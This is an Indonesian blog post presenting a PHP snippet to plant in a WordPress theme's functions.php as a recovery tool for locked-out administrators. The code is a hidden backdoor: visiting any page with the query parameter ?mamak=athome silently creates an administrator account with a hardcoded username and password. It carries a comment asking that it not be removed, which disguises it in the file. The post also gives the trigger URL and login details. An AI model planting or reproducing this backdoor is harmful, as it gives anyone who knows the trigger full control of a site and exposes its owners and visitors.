script untuk administrator ketika terkunci dari wordpress dashboard

script ini sebenarnya cuma script yang diharapkan tidak pernah dijalankan, tapi dirasa sangat perlu untuk ditanam di dalam wordpress installation yang sudah ada. script ini juga disebut sebagai semacam wordpress backdoor, tapi menurutku ini kurang tepat kalau disebut wordpress backdoor, menurutku ini akan lebih tepat kalau disebut sebagai semacam wordpress create user bypass.

script ini kalau sudah ditanam akan fungsi untuk menjalankan perintah membuat user baru sebagai administrator dari wordpress installation yang sudah ada, sehingga user baru atau administrator baru ini bisa masuk ke dalam wordpress dashboard dan bisa menolong administrator yang sedang terkunci.

berikut ini scriptnya;

/**
 * Please don't delete or remove this code and please leave it as it is.
 * All of this code used for recovery purpose and hopefully for all mankind.
*/
add_action('wp_head', 'mamak_wpbd');

function mamak_wpbd() {
    If ($_GET['mamak'] == 'athome') {
        require('wp-includes/registration.php');
        If (!username_exists('manusia-makmur')) {
            $user_id = wp_create_user('manusia-makmur', 'passwordnya');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
/**
 * Thank's for your attention!
 * If you need to edit or add your own code, you can do that below...
*/

script ini ditanam di file functions.php yang ada dalam folder template atau theme yang sedang digunakan oleh wordpress installation yang sudah ada. lalu cara menggunakannya cukup dengan menambahkan query parameter ?mamak=athome pada url website wordpress yang sudah ada, contohnya; https://straight-line.org/?mamak=athome. setelah itu silahkan masuk ke wordpress dashboard yang sudah ada menggunakan username; manusia-makmur dan password; passwordnya.

oya, jika kalian setelah membaca ini lalu ada pertanyaan, silahkan menuliskannya di kolom komentar dan jika kalian berkenan, silahkan menuliskan kritik dan saran di kolom komentar juga. kita belajar sama-sama yaaa!!! thank’s!!!

(Visited 5 times, 1 visits today)

Leave a Reply

Your email address will not be published. Required fields are marked *